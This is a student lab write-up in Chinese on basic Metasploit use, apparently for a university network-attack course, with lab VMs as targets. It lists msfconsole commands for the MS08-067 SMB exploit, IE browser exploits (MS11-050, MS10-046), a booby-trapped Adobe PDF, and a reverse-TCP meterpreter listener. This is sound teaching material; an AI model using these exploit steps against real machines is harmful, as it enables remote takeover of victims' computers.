20155308『网络对抗技术』Exp5 MSF基础应用

一、原理与实践说明

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,如ms08-067; (1分)

  • 一个针对浏览器的攻击,如ms11-050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode
  1. exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。
  2. payload:病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做"有效负载"(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。
  3. encode:编码,编制成计算机语言

实践内容

目录

  • 主动攻击:ms08_067漏洞攻击
  • 对浏览器攻击:ms10_046漏洞攻击
  • 对Adobe的漏洞攻击:adobe_toolbutton
  • 尝试利用漏洞对win7系统进行攻击

Windows服务渗透攻击——MS08-067安全漏洞

攻击机:Kali(IP地址:192.168.91.135)

靶机: windows XP SP3(English)(IP地址:192.168.91.134)


在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(windows/smb/ms08_067_netapi) > show payloads
  • msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
  • msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135 //攻击机ip
  • msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308 //攻击端口
  • msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134 //靶机ip,特定漏洞端口已经固定
  • msf exploit(windows/smb/ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
  • msf exploit(windows/smb/ms08_067_netapi) > exploit //攻击


  • 建立会话,攻击成功结果如下:


针对浏览器的攻击:ms11_050

攻击机:kali (IP地址:192.168.91.135)

靶机:WindowsXP Professional sp2/Windows7专业版 (IP地址:192.168.91.136)


在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use windows/browser/ms11_050_mshtml_cobjectelement

  • info指令查看该模块的信息

  • targets信息

  • options信息

  • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp //http反向回连
  • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135 //攻击机ip
  • msf exploit(ms11_050_cobjectelement) > set LPORT 5308 //攻击端口固定
  • msf exploit(ms11_050_cobjectelement) > set URIPATH baidu //统一资源标识符路径设置
  • set target 1
  • msf exploit(ms11_050_cobjectelement) > exploit

  • 攻击成功后会有靶机需要访问的网址

  • 但是不知道一直回连不成功,一直再试,也不知道为啥??看了我们小组长的博客,我学习了新的浏览器攻击方式,见下面。

对浏览器攻击:ms10_046漏洞攻击


  • use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用
    show payloads
    查看可以供我们使用的payload

  • SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:
  • 使用exploit指令执行漏洞,可以看到生成了一个url:

  • 使用exploit指令执行漏洞,可以看到生成了一个url:

  • 在MSF终端看见漏洞执行成功:

针对Adobe Reader软件的渗透攻击——adobe_toolbutton

攻击机:kali

靶机:windowsXP Professional sp2

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • 先用search adobe得知此漏洞所在的模块

  • 选择一个模块


  • show targets查看可以被攻击的靶机的操作系统型号

  • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
  • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135 //攻击机ip
  • msf exploit(adobe_cooltype_sing) > set LPORT 5308//攻击端口
  • msf exploit(adobe_cooltype_sing) > set FILENAME 5308hwf.pdf //设置生成pdf文件的名字
  • msf exploit(adobe_cooltype_sing) > exploit//攻击

  • 找到5308hwf.pdf文件

  • 将文件放到靶机上

  • 在kali上进入监听模块,输入以下命令:

  • msf > use exploit/multi/handler //进入监听模块
  • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp反向连接
  • msf exploit(handler) > set LHOST 192.168.91.135 //攻击机ip
  • msf exploit(handler) > set LPORT 5308 //攻击端口固定
  • msf exploit(handler) > exploit

  • 发现已经获取了被攻击者权力,可以对其进行操作

  • 若关闭pdf文件,则失去权限,攻击失败

成功应用任何一个辅助模块

  • 输入命令show auxiliary查看所有辅助模块

  • 选择其中一个即可

  • 用指令info查看相关信息

  • 进行扫描,结果如下图所示

实验中的问题

  • 我在进行kali机的IP地址的查询时,正常的地址显示是这样的

  • 但是总是出现eth0消失的情况:

  • 针对这个问题,我之前的解决办法其一是关闭虚拟机,重新开一遍,地址就会正常了。其二就是重新安一下虚拟机,所以我的硬盘中虚拟机总是得备份。但是总是出现这个问题也不是办法,我相信有的同学也遇到过这个问题(不会只有我这么惨吧???)

  • 解决:

一般是eth0被禁掉了,就只会显示127.0.0.1这个回环地址 你用
ifup eth0 ifconfig up eth0 上面两个命令都可以,然后 /etc/init.d/network restart你就能看到eth0了。

  • 下面这篇博客是解释“linux系统查看IP地址,不显示IP地址或者只显示127.0.0.1”原因及解决过程,可以参考一下。

https://blog.csdn.net/qq_36769100/article/details/71473632

实验感想

本次实验通过通过MSF的攻击模块对计算机进行各种攻击方法的实践,比前几次的攻击更加的系统化,同时攻击的方法更加深入。通过最后一个板块的研究,使我将学习理论知识转化为自我实践过程。

在其中某些模块的学习中,总是会有攻击不成功的地方,每当不成功,我就很懊恼,为啥总是很别人的不一样。但是在课上听到老师说,攻击不成功是很正常的事情,我突然感觉到了信心。然后通过查找学长学姐或是网上的解决方法,不断解决问题,最后成功,感觉很有成就感。

20155308『网络对抗技术』Exp5 MSF基础应用的更多相关文章

  1. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  2. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...

  3. 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利 ...

  4. # 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  5. 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  6. 20155308『网络对抗技术』Exp7:网络欺诈防范

    20155308『网络对抗技术』Exp7:网络欺诈防范 原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. 微信小程序开发--背景图显示

    这两天开发微信小程序,在设置背景图片时,发现在wxss里面设置 background-image:(url) 属性,不管是开发工具还是线上都无法显示.经过查资料发现,background-image ...

  2. Android5.x Notification应用解析

    Notification可以让我们在获得消息的时候,在状态栏,锁屏界面来显示相应的信息,很难想象如果没有Notification,那我们的qq和微信以及其他应用没法主动通知我们,我们就需要时时的看手机 ...

  3. Python+Selenium笔记(八):操作下拉菜单

    (一) Select类 Select类是selenium的一个特定的类,用来与下拉菜单和列表交互. 下拉菜单和列表是通过HTML的<select> 元素实现的.选择项是通过<sele ...

  4. 域名检索&路由算法

    域名查询顺序: a. 浏览器缓存(本机hosts文件),浏览器会缓存DNS记录一段时间. b. 系统缓存 c. 路由器缓存 d. 检查ISP e. 递归搜索域名服务器 路由算法: 一.静态路由算法 a ...

  5. android打开存储卡(TF卡\SD卡)中的sqlite文件

    android的SDK直接支持sqlite3的API.   打开SD卡上面的sqlite数据库,不需要SQLiteOpenHelper的继承类.只需要,SQLiteDatabase中的一些静态方法.如 ...

  6. IIS 安全设置

    这近网站中毒,以下把IIS安全设置记录一下,以便查阅. 1.对于不需要执行的目录,将处理程序映射中的编辑功能权限中的脚本去掉,这样即使上传了木马文件在此目录,也是无法执行的. 删除IIS默认的匿名用户 ...

  7. mac层和llczi层

    1.何为数据链路层的(DATA LINK LAYER)的MAC子层和LLC子层? MAC子层的主要功能包括数据帧的封装/卸装,帧的寻址和识别,帧的接收与发送,链路的管理,帧的差 错控制等.MAC子层的 ...

  8. Ecstore Nginx Rewrite(去掉链接中的index.php) ECSTORE 伪静态

    一.修改 nginx.conf文件,添加如下代码: if ($request_uri ~ (.+?\.php)(|/.+)$ ){ break; } if (!-e $request_filename ...

  9. MySql详解(三)

    MySql详解(三) 导入基础表 具体的SQL文件已经放入百度网盘,连接为:http://pan.baidu.com/s/1hseoVR2,后面的MySql内容都是按照这些基础表展开的. depart ...

  10. animate is not a function(zepto 使用报错)[转]

    animate is not a function(zepto 使用报错) 1.为什么使用zepto写animate报错? 因为zepto默认构建包含: Core, Ajax, Event, Form ...